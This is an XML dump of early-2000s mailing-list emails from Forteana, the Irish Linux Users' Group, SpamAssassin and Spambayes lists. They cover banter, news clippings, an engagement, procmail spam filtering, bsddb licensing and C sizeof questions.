    <t xml:space="preserve">&gt; &gt;It's official, I'm a failure. Same here.One 6th Form college colleague is Yvette Cooper, MP for Pontefract and Castleford, and Parliamentary Secretary at the Lord Chancellor's Department. A strange constituency for someone born and bred in rural Hampshire.A fellow pupil at school was Julie Fernandez who was in the fabulous soap 'Eldorado' and played Brenda in the recent series of 'The Office'Dave
Govt wage slave in Manchester To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Jayne Ayris"  wrote:
&gt; Think of a letter between A and W. 
Oh, all right, then. I'll give it a go.
Hmm. Let's See."L"
&gt; Now think of an animal that begins with that letter. "Lynx"
&gt; Repeat it out loud as you scroll down. "Lynx"
"Lynx"
"Lynx"
"Lynx"
"Lynx"
&gt;  Think of either a man's/woman's name that begins with
&gt;  the last letter in the animals name "Xena"
&gt;  Almost there........ OK.
&gt;  Now count out the letters in that name on the fingers
&gt; of the hand you are not using to scroll down. "X"
"E"
"N"
"A"
&gt;  Take the hand you counted with and hold it out in
&gt;  front of you at face level 
All righty...&gt;  Look at you palm very closely and notice the lines in
&gt;  your hand Lots of lines. Lines and lines and lines and lines.
&gt;  Do the lines take the form of the first letter in the
&gt;  persons name? Holy crap, they do! Amazing! Feckin' "X"s all over the feckin' place. 
Man that is sooo cool!!11!!!!!!111!!&gt; Of course not....... Au contraire. Look at 'em. XXXXXXXXXXs, Zillions of 'em.I am looking at them this very moment.&gt; Now smack yourself in the head, get a life, and quit
&gt; playing stupid e-mail games!Are you talking to moi? Are you accusing me of being less than 
sapient? Are you suggesting I am life-bereft?Igor, power-up a couple of dozen web-bots - the search-and-destroy 
attack ones with the hard-drive killers. I shall have my revenge in 
this domain or the next.Robin (Not the BAE SYSTEMS spy at all, it turns out) Hill, STEAMY 
BESS, Brough, East Yorkshire.To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; US listers will recognise Damian Lewis as Lieutenant/Captain/Major 
&gt; Winters from "Band of Brothers" which is annoying as he was one of 
&gt; the actors I was sure was actually american.  I wouldn't be 
surprised 
&gt; now if someone told me they were all british actors...
&gt; 
&gt; StewI was watching that last night and I couldn't help wondering if one 
of the GIs was Dexter Fletcher out of the Crystal Maze. Does this 
mean it could actually have been him?
timh
Who once snogged Shauna Lowery, if anyones heard of her. 
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">TimH:&gt;I was watching that last night and I couldn't help wondering if one 
&gt;of the GIs was Dexter Fletcher out of the Crystal Maze. 
Yup, was him out of Press Gang&gt;Who once snogged Shauna Lowery, if anyones heard of her. 
Did you have to kneel down?
DaveTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "David McQuirk"  wrote:
&gt; TimH:
&gt; 
&gt; &gt;I was watching that last night and I couldn't help wondering if 
one 
&gt; &gt;of the GIs was Dexter Fletcher out of the Crystal Maze. 
&gt; Yup, was him out of Press Gang
&gt; 
&gt; &gt;Who once snogged Shauna Lowery, if anyones heard of her. 
&gt; Did you have to kneel down?
&gt; 
&gt; 
&gt; DaveIts possibly a different Shauna Lowery: The one I'm talking about is 
about 7 foot tall and presents "Animal Hospital" or something like 
that.
tim h
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Its possibly a different Shauna Lowery: The one I'm talking about 
is 
&gt; about 7 foot tall and presents "Animal Hospital" or something like 
&gt; that.
&gt; tim hOh, and I'm less than 7 foot tall, so it would be her who had to 
kneel down
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;
&gt;hi i was just wondering if anyone experiening difficulty with eircom
mail
&gt;sever.I was trying to send mail from mozilla mail but it keeps coming
up
&gt;with this error:
&gt;sorry,that domain isnt in my list of allows rcpthosts(#5.7.1)
&gt;please check the message recipients and try again.
&gt;
&gt;What is this all about.
&gt;I am using mail2.eircom.net as my smtp and my pop, i can recieve mail
but
&gt;i cannot send mail. is there any other open relay that i  can use.I think you'll find it's at Eircons end. I occasionally have problems
sending to a server I use, whose admin said it's a known bug for which
he had to apply a patch... you'll probably want to tell eircon's admins
that they need to patch the server, and to re-do it if they think it's
already done...sorry for the lame answer, but it's been so long I've forgotten the
details.Have Fun,
Jim.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">TimH:&gt;Its possibly a different Shauna Lowery: The one I'm talking about is 
&gt;about 7 foot tall and presents "Animal Hospital" or something like 
&gt;that.
Ahhh, I'm getting my Lowry's(sp) mixed upI was thinking of Lowry Turner of DIY SOSabout 3 feet shorterDaveTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">URL: 1983@http://diveintomark.org/
Date: 2002-12-01T15:39:49-05:00Upon arriving safely in Raleigh, our stewardess sang us this, to the tune of 
Barney's I Love You, You Love Me:     We love you,
    You love us,
    We're much faster
    Than the bus.     We hope you've enjoyed our
    hos-pi-tal-i-ty,
    Marry one of us
    And you'll fly free. </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/2/hi/africa/2510637.stmIt's a shame that these guys are some controversial sect --
I'd be much more into it if these were mainstream and we
could task the kneejerk Christians with this fact...      /t
-- http://loopNY.com ......................An "open loop": shows every Saturday!
http://extremeNY.com/submit .......................... submit to the calendar.To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">One more congratulation from me, Tim. Why 'Ro' instead of 'Rose' as a short
form of 'Rosemary'? Is it a Welsh thing?BillWilliam Jacobs
Sporadically Underemployed Person
I wish to God these calculations had been executed by steam! - Charles
Babbage
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.irishnews.com/access/daily/current.asp?SID=421083Loo rolls of honour and the invisible manPaper Clips: A round-up of the weekly pressBy Steven McCafferyThe powers-that-be tell us that crime does not pay. And they found an 
ally in the Ulster Herald this week, which carries a cautionary tale 
for anyone thinking of embarking on a criminal career. The 
Omagh-based paper's 'As the Man Says' column brings a story which 
originated in the Middle East."A gent recently attempted to rob a bank in Tehran," the columnist reports."He was unarmed and began seizing bank notes from customers' hands."It is then explained: "He had paid Â£625 to a local sorcerer and 
believed that he was invisible."In the Lurgan Mail there was also news of a dramatic robbery."A Lurgan newsagent has told how thieves drilled their way through 
three walls to steal Â£10,000 worth of cigarettes recently in an 
attack which was well planned and professional," the paper reports."The thieves broke through the back wall of a religious gifts shop 
next door to the newsagents and then drilled through the partition 
between the back hallway and the front shop."Moving statues of religious icons out of the way, the gang then 
drilled into the back of the newsagent's cigarette stand removing the 
contents."The owner of the Paper Chase shop is pictured next to the gaping hole 
left in his store and is quoted as saying: "On Monday morning when my 
wife was opening, everything looked normal."But when she opened the shutters she found herself looking into the 
shop next door."The paper reports that the shop was the target of "another well 
organised crime" 12 weeks ago when thieves escaped with a safe.The shop's owner says: "The closer it gets to Christmas the more 
people are going to be open to this."The issues of crime and punishment are tackled by a columnist in the 
Down Democrat.Writing in the Downpatrick-based newspaper John Coulter calls on the 
authorities to "birch the vandals" plaguing the local community.He is shocked at reports of the "wanton destruction by vandals" and 
issues a call for action."The time has come to fight fire with fire," he writes, "before 
unemployed paramilitaries decide to impose vigilante rule and start 
using so-called kangaroo courts to dish out their own brand of 
sentences on those found 'guilty' of anti-social behaviour."As an alternative to such reckless violence, he recommends, 
controlled violence."It was a sorry day that the Manx authorities banned the use of the 
birch as a weapon in dealing with unruly elements of the Isle of Man."Getting his defence in early, he immediately rounds on any woolly 
liberal who may oppose his plan."In many Islamic countries, public flogging of convicted criminals is 
the order of the day."You might laugh and say there is little chance of such measures 
being introduced in the United Kingdom or Ireland given that corporal 
punishment was abolished in the vast majority of northern schools in 
the late 1980s."However, people seem to forget that Islam is the fastest growing 
faith on the British mainland and it's only a matter of time before 
it numerically passes Christianity."
-- 
Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk
--
"I am the centre which exists only because the geometry of the abyss 
demands it." - Fernando Pessoa
--
Currently playing: nothing.To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">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He'll find out who and where you are and send you his
    review of your email and an invoice for EUR 1,000 for his services.
    Plus he'll probably try to patch me in some unpleasant way so *please*
    don't reply if you're one of those people.in addition, all of this information is logged.  in the past two to three
months, two spammers have replied.  i think that this is a valid notice.
what i'm wondering is the following:    a)  are there debt collection agencies you can hire to get such debts?
    b)  if i can't get money from them, can i declare them on my taxes
	here as a bad debt and get tax relief?one way to get the gov't to notice spam...kevin--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
</t>
  </si>
  <si>
    <t xml:space="preserve">This is possible, however using SA as a block criteria is not recommended. 
SA does have a very realistic chance of mis-marking mail so using it as an 
autodelete function is at best extraordinarily foolish.
However, here's what the procmail rule will look like (dug up from an old 
post to this list by Steve Thomas):
--------------------------------------------------------------------
in your .procmailrc file::0
* x-spam-status: yes
/dev/null
DO NOT DO THIS! You'll throw out a LOT of legitimate messages over time.Instead, do what the docs suggest and put them into a separate mail folder::0:
* x-spam-status: yes
$MAILDIR/spam
--------------------------------------------------------------------
At 02:55 PM 11/25/2002 +0100, Erik Jakobsen wrote:
&gt;Hi.
&gt;
&gt;How can I block e-mails comming to me by aid of SA ??.
&gt;--
&gt;Med venlig hilsen - Best regards.
&gt;Erik Jakobsen - erik@urbakken.dk
&gt;SuSE Linux 8.1
&gt;
&gt;
&gt;-------------------------------------------------------
&gt;This sf.net email is sponsored by:ThinkGeek
&gt;Welcome to geek heaven.
&gt;http://thinkgeek.com/sf
&gt;_______________________________________________
&gt;Spamassassin-talk mailing list
&gt;Spamassassin-talk@lists.sourceforge.net
&gt;https://lists.sourceforge.net/lists/listinfo/spamassassin-talk-------------------------------------------------------
This SF.net email is sponsored by: Get the new Palm Tungsten T 
handheld. Power &amp; Color in a compact size! 
http://ads.sourceforge.net/cgi-bin/redirect.pl?palm0002en
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- Martin Adamson 
wrote:
&gt; 
&gt; &gt; Two demonstrators heading to Saturday's
&gt; anti-war
&gt; &gt; march in San Francisco were critically
&gt; injured
&gt; &gt; when their heads, sticking through the roof
&gt; of a
&gt; &gt; former school bus, hit the top of the
&gt; Broadway
&gt; &gt; Tunnel.
&gt; 
&gt; Not quite so funny as they both subsequently
&gt; died, I think.
&gt;   Broadly, I was trying to be both vulgar and
ironic. In a "big city" as small as San Francisco
there is, as I believe I stated in the initial
post, maybe ONE PLACE in the whole that they
shoulda kept their heads inside. They were told
to, they didn't, and they got what was coming to
them. I'll feel bad about getting a sick chuckle
out of it maybe when it happens to someone I know
personally. Til then, haw haw haw. Like the
Darwin awards. Get it??
          Sloanie__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus ï¿½ Powerful. Affordable. Sign up now.
http://mailplus.yahoo.comTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">----- Original Message -----
From: "Tim Chapman" 
To: "zzzzteana" 
Sent: Monday, November 25, 2002 8:53 AM
Subject: [zzzzteana] An announcement
&gt; Mr Tim Chapman, freelance gentleman of letters of Halifax, Yorkshire,
&gt; announces his betrothal to Dr Ro Gault, virtual reality boffin of Cardiff
&gt; University, Wales. Nuptials to be arranged at later date. No flowers.
&gt;
&gt; TimC
&gt; Bloody hell, she said yes!
________________________Congratulations Ro &amp; Tim - Here's to your lifelong happiness.Here's some advice written by Odgen Nash:"To keep love brimming in the loving cup, When you're wrong admit it and
when you're right shut up!"Best wishesJu
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Mr Tim Chapman, freelance gentleman of letters of Halifax,
Yorkshire,
&gt; announces his betrothal to Dr Ro Gault, virtual reality boffin of
Cardiff
&gt; University, Wales. Nuptials to be arranged at later date. No
flowers.
&gt;
&gt; TimC
&gt; Bloody hell, she said yes!Yay!Jayne.
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Smith, Graham - Computing Technician wrote:
&gt; 
&gt; ntp.cs.tcd.ie  (thats a strata 2 isnt it? are there any other publically
&gt; accessible NTP servers in Ireland?)tick.indigo.ie
tock.indigo.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Geege wrote a strange story:
&gt;I know a guy who in attempting to loosen  a nut at the base of the toilet 
&gt;tapped it with a wrench, cracked the bowl in HALF, and, to prevent a flood, 
&gt;held the bowl together with his knees until his wife returned from work 
&gt;quite some time later.The bowl doesn't hold that much water. I
would have let it spill, and then cleaned
it up. Even the tank only holds a gallon,
if new, or three, if old.
_________________________________________________________________
MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. 
http://join.msn.com/?page=features/virus
</t>
  </si>
  <si>
    <t xml:space="preserve">
[Paul Moore]
&gt;    but let's walk before we run - after all, we may end up
&gt;    all using Zodb in any case :-)I'd like this (despite the additional installation burden - we can ship
binaries for Windows and Mac) and not only for technical reasons.  As I
understand it, post-1.8x versions of the core bsddb code ship under the
Sleepycat license, which demands that projects using it must be
published-source.  This is a problem if we want Spambayes to be fully
PSF-licensed - if someone wants to take the Spambayes source and fund their
addictions by creating a commercial, closed-source spam-filter product, the
PSF license allows that but not if the code relies on bsddb.  Not that I'm
in favour of people making money from Spambayes (unless it's me 8-) but the
PSF license does allow for it - it should be all or nothing.  Or do I have
this all wrong?Slightly OT: This has concerned me since PLabs announced that they were
integrating bsddb into Python 2.3 - it's going to make it very easy
(especially on Windows) for someone to write code that uses anydbm, wrap it
up with Py2exe and ship it under a commercial license, not knowing that
they're breaking the Sleepycat license.  They've never heard of Sleepycat
Software or even bsddb - as far as they're concerned, this "bsddb.pyd" file
that Py2exe tells them they need to ship is just another part of Python,
like _socket.pyd or select.pyd.-- 
Richie Hindle
richie@entrian.com
_______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Nov 25, 2002 at 06:54:49PM +0000, Philip Trickett wrote:
&gt; how much overhead does this add to your daily 'email reading'?like i said, two emails in about 2 to 3 months.&gt; Now tell me, is there a way to stop them from forging the from: address
&gt; to a nonexistent address at a domain you own and use actively? At the
&gt; moment I am at 1200 bounces and counting!  Good job I'm on ADSL
&gt; otherwise I would be throwing a fit...yes, i whitelist the minimum required.kevin--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
</t>
  </si>
  <si>
    <t xml:space="preserve">
I don't know how one can expect better and more secure code from the
community when this being a security list some post like this shows
clearly no knowledge of C.On Fri, Nov 22, 2002 at 10:27:53PM +0500, Ali Saifullah Khan wrote:
&gt; Here is a test done on the return of sizes by sizeof() using pointers.
&gt; 
&gt; #include 
&gt; 
&gt; int main(void) {
&gt;  char *testbuff[1024];
   ^^^^^^^^^^^^^^^^^^^^Read it like this: new array with 1024 elements of type pointer to char.
As a pointer occupies the natural word size (32 bits or 64bits), no wonder
you get 4*1024 (sizeof(char *) * numer_of_elements).&gt;  int len = sizeof(testbuff);
&gt;  cout &lt;&lt; len &lt;&lt; "\n";
&gt;  return 0;
&gt; }&gt; using " int len = sizeof((char*)testbuff); "
sizeof returns the size of types. You can use it with vars (and then the
normal form is sizeof var, not sizeof(var)), but if you're changing the
type with the var with a cast, of course you'll get the size of that new
type.Regards,
Luciano Rocha-- 
Consciousness: that annoying time between naps.
</t>
  </si>
  <si>
    <t xml:space="preserve">No, you need to learn how declarations work in C.  You have specified
testbuff as "an array of 1024 pointers to characters".  That means,
you have allocated an array big enough to store 1024 pointers.  On
most machines, that's 4 bytes per pointer, which indeed would give you
4096.JohnOn Fri, Nov 22, 2002 at 10:27:53PM +0500, Ali Saifullah Khan wrote:
&gt; Here is a test done on the return of sizes by sizeof() using pointers.
&gt; 
&gt; #include 
&gt; 
&gt; int main(void) {
&gt;  char *testbuff[1024];
&gt; 
&gt;  int len = sizeof(testbuff);
&gt;  cout &lt;&lt; len &lt;&lt; "\n";
&gt;  return 0;
&gt; }
&gt; 
&gt; c:&gt;debug\testbuff
&gt; 4096
&gt; 
&gt; The output from this is 4096 but infact it should be returning 1024.
&gt; Apparently, using a pointer has multiplied the value of the original size of
&gt; the testbuff[] buffer by the size of the " pointer " ?
&gt; 
&gt; char pointers have a size of 4 bytes.....as is shown when output is 4 bytes
&gt; using " int len = sizeof((char*)testbuff); "
&gt; 
&gt; c:&gt;debug\testbuff
&gt; 4
&gt; 
&gt; so sizeof is returning the size of the "first" entity passed to it, that
&gt; being the size of the pointer. " * "
&gt; 
&gt; Whats confusing is when sizeof outputs the value for something like " char *
&gt; testbuff[] "
&gt; Here the macro seems to be multiplying the sizes of entities passed to it,
&gt; by considering the first entity as the pointer denoted by the asterisk
&gt; itself " * ", and then taking this value of 4 and multiplying it with the
&gt; size of the buffer testbuff[] which is 1024, to produce an output of 4096.
&gt; 
&gt; Rather strange behaviour. ???
&gt; ----- Original Message -----
&gt; From: 
&gt; To: 
&gt; Cc: 
&gt; Sent: Tuesday, November 19, 2002 2:59 AM
&gt; Subject: Re: Are bad developer libraries the problem with M$ software?
&gt; 
&gt; 
&gt; &gt; ----- Original Message -----
&gt; &gt; From: John Viega
&gt; &gt; Sent: 11/18/2002 2:28:08 PM
&gt; &gt; To: cdavison@nucleus.com
&gt; &gt; Cc: secprog@securityfocus.com
&gt; &gt; Subject: Re: Are bad developer libraries the problem with M$ software?
&gt; &gt;
&gt; &gt; &gt; strlen does not work, because he was trying to get at the ALLOCATED
&gt; &gt; &gt; size of a buffer, not the actual size of the buffer.
&gt; &gt;
&gt; &gt; You're right. I was looking at the safe_strncpy code, and it looks like
&gt; the author did use strlen.
&gt; &gt;
&gt; &gt; &gt; sizeof will return the size of the data type passed to it.  So if you
&gt; &gt; &gt; declared mystr as char mystr[1024];, it will return as the original
&gt; &gt; &gt; author wanted.
&gt; &gt;
&gt; &gt; It will not work with a char*, so if your strings are dynamically
&gt; allocated, or passed to you as a pointer, these macros will not work.
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Richie&gt; As I understand it, post-1.8x versions of the core bsddb code
    Richie&gt; ship under the Sleepycat license, which demands that projects
    Richie&gt; using it must be published-source.  Don't use bsddb in a closed-source product.  Use dbm or dumdbm or use
pickles or roll your own thang.  I doubt the presence of bsddb would be the
only barrier to creating a closed-source product based upon the spambayes
code.Skip_______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Paul&gt; I suspect the best answer is to make the DBM implementation
    Paul&gt; configurable via bayescustomize.ini (with the default being
    Paul&gt; anydbm).I think you might want to specify the database open function instead of just
the module.  There are three ways to open db files with bsddb (btopen,
hashopen, rnopen).  That will require a little more trickery in Options.py,
but not an insane amount.Skip_______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">The Times 
 December 04, 2002 
 University boom creates era of sexual tolerance By Helen Rumbelow
 THE boom in university education has led to a sea change in BritainÂ’s
 tolerance of homosexuality, according to a report. Just under half the people
 now believe that homosexuality is always or mostly wrong, down from three
 quarters 15 years ago, according to the British Social Attitudes survey,
 regarded as one of the best indicators of popular opinion. 
 That trend is mirrored by the attitude towards ethnic minorities, with 75 per
 cent of people now saying they are not at all racially prejudiced, compared
 with 60 per cent in 1987. 
 Geoffrey Evans, a politics professor at Oxford University, decided to focus on
 what has caused Britain to become more open-minded in a report published
 today. The study, from the National Centre for Social Research, is based on
 interviews with a cross-section of 3,500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41 per cent of young people now attending university, it was a
 powerful social effect, Professor Evans said. 
 Â“Mr BlairÂ’s famous mantra Â‘education, education, educationÂ’ seems far less
 consequential now than when first announced in 1997, as Britain struggles with
 an overburdened health service and the reality that as more and more people
 get degrees, degrees buy less and less,Â” he said. 
 Â“But the growth of higher education can provide a bulwark against the
 undermining of liberal democracy through intolerance,Â” he added. 
 He decided to see whether the tolerance conferred by schooling was just
 Â“political correctnessÂ”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than half
 the country wanting cannabis to be legalised, compared with a third seven
 years ago. That is probably because the use of cannabis is now so widespread,
 with a quarter of those surveyed saying that they had tried it. 
 A third of Labour voters, twice as many as Conservatives, had tried the drug,
 and being young, living in London and having a degree also increased the
 chances. 
 One issue that bucks the trend is hard drugs. Most take a strong position on
 heroin that has got stronger over the past seven years. Now the proportion of
 people who believe that heroin dealers should always be prosecuted has crept
 up to 97 per cent. 
 Â“The views on heroin show that Britain is by no means becoming a liberal
 free-for-all,Â” Alison Park, co-director of the study, said. Â“People are making
 quite a clear distinction between what they think (of) as right and wrong.Â” 
 On other matters, the survey indicates that almost half those questioned think
 that most of the social security budget goes on unemployment benefits Â— in
 fact, they account for 6 per cent; that union membership has fallen by a fifth
 in the past 18 years, with just under a third of workers in a union; and that
 half those questioned oppose secondary school selection. In 1984 the figure
 was 40 per cent. 
 The survey also indicates that 19 per cent of men aged between 25 and 34 live
 with their parents, twice as many as women.
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">I have to say I was surprised about Jacko dangling that kid of the
balcony.
Usually he just tosses them off...Boomboom.D
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Now then I recently read a novel about exactly that sorta thing
happening. Can't remember what is was called tho..maybe something like
51st State?-----Original Message-----
From: Andrew Dennis [mailto:andrew@fidai.clara.net] 
Sent: 03 December 2002 08:36
To: zzzzteana@yahoogroups.com
Subject: [zzzzteana] Re: FWD (ExT) USA more popular than ever in Britain
--- In forteana@y..., "uncle_slacky"  wrote:
&gt; --- In forteana@y..., Andy  wrote:
&gt; &gt; then the result would be a resounding 3.
&gt; 
&gt; It wouldn't be such a bad idea, because (at least in terms of
trade) 
&gt; we have all the disadvantages of a client state combined with all
the 
&gt; disadvantages of being a foreign country.
&gt; 
&gt; Rob
&gt; 
&gt; airstrip one, anyone?Not a bad idea at all, provided we avoid Texas's mistake.  If we get 
two senators for each of Scotland, Norn Iron, Wales and England, plus 
our fair share of congressthings, we end up with the biggest voting 
block in the US legislature and for the presidency, with a political 
spectrum whose extreme right can't poke the extreme left of the 
current US one with a long, long stick.  One sudden lurch to the left 
by the US political establishment later, we own the place.Byzantium, anyone?Andrew D.
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to
http://docs.yahoo.com/info/terms/ To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">What the hell is it with these mini remote control cars? Not only has 
my mailbox been full of spam advertising them, but there's a fairly 
large stall selling them at Paddington station.
-- 
  Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk
--
"What's orange and looks good on hippies? Fire." - Steve Albini
--
Currently playing: nothing.To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">here, for your enjoyment, is a little something discovered by my daughter
Kim.http://www.b3ta.com/patrickmoore/b
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.404 / Virus Database: 228 - Release Date: 15/10/2002
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Sean O'Donnell wrote:
&gt; Doesnt answer your question, but theres a very simple reason i 
 &gt; develop a lot on mysql, it runs on windows and linux, a lot of
 &gt; clients only have windows servers, and last time i checked
 &gt; you can only run postgresql on windows with a lot of fecking
&gt; around with cygwin. give postgres a decent standalone windows 
 &gt; build and i reckon you would see a lot of defections.This is pertinent: http://lwn.net/Articles/17067/PÃ¡draig.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Joe McNally writes:&gt; What the hell is it with these mini remote control cars? Not only has 
&gt; my mailbox been full of spam advertising them, but there's a fairly 
&gt; large stall selling them at Paddington station.
&gt; -- 
&gt;   Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk 
&gt;Any chance you could bring a wire-cutters with you the next time you're 
passing through, and cut their 'net connection? 
Hang on....mini - Mini... the the ETs have seen the Mini advert and have 
decided to get revenge by invading in the form of spambots and small 
'remote' cars. These are the probes that some of the Saucerheads rattle on 
about, probes that are fired into the atmosphere from the mama-ships. Thanks Joe, there's an idea for a whacky blather issue here. To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/world/europe/2541827.stmWednesday, 4 December, 2002, 08:52 GMT
Bomber targets Dutch Ikea storesPolice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building.To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Hi all.
Does anyone know how to set up dual keyboards(one is actually a stand-alone
keypad)?
Both keyboards have PS/2 connections and I want the keypad to be plugged in
as the primary input device.  Then if the other keyboard is plugged in, that
should take over.
Possible?  Any possible hacks?
Thanks!
Carlos-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Carlos Luna wrote:&gt;Hi all.
&gt;Does anyone know how to set up dual keyboards(one is actually a stand-alone
&gt;keypad)?
&gt;Both keyboards have PS/2 connections and I want the keypad to be plugged in
&gt;as the primary input device.  Then if the other keyboard is plugged in, that
&gt;should take over.
&gt;Possible?  Any possible hacks?
&gt;  
&gt;
get a 'keyboard switch' - I think even Viking Direct and Maplin stock them.&gt;  
&gt;________________________________________________________________________
This email has been scanned for all viruses by the MessageLabs SkyScan
service. For more information on a proactive anti-virus service working
around the clock, around the globe, visit http://www.messagelabs.com
________________________________________________________________________
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all
I have a prob when trying to install Linux (tried RedHat, Suse) on my
laptop. I can start the install but after about 2min, the whole pc just
dies.
I know it's not a Linux prob and here is what I have encountered:I had the same problem when installing Win on it and eventually sorted it
out by disabling the infrared port. I'm guessing this might be same prob
although I'm not sure. I am very new to Linux so it's not that easy for me
to work it out. I did manage to follow the setup procedure at one stage
(using images on disks) and it cuts out either as it's trying to verify what
CD-Rom I have or just after (hence my suspicion of the infrared port again).can anyone help ?thanks
Gianni
************************************************************************
This e-mail and any files transmitted with it are confidential
and intended solely for the use of the individual or entity to
which they are addressed. If you have received this e-mail
in error, please notify the EPA postmaster - postmaster@epa.ieThe opinions contained within are personal to the sender and 
do not necessarily reflect the policy of the Environmental 
Protection Agency.This footnote also confirms that this e-mail message has been
swept by MIMEsweeper for the presence of computer viruses.************************************************************************
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Tim Chapman writes:&gt; http://news.bbc.co.uk/1/hi/world/europe/2541827.stm 
&gt; 
&gt; Wednesday, 4 December, 2002, 08:52 GMT
&gt; Bomber targets Dutch Ikea stores 
&gt; 
&gt; Police in the Netherlands are searching all 10 outlets of the Ikea furniture
&gt; chain in the country, after finding bombs in two stores. 
&gt;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hard-working indigenous peoples of
wherever."
 - Jack, Fight Club 
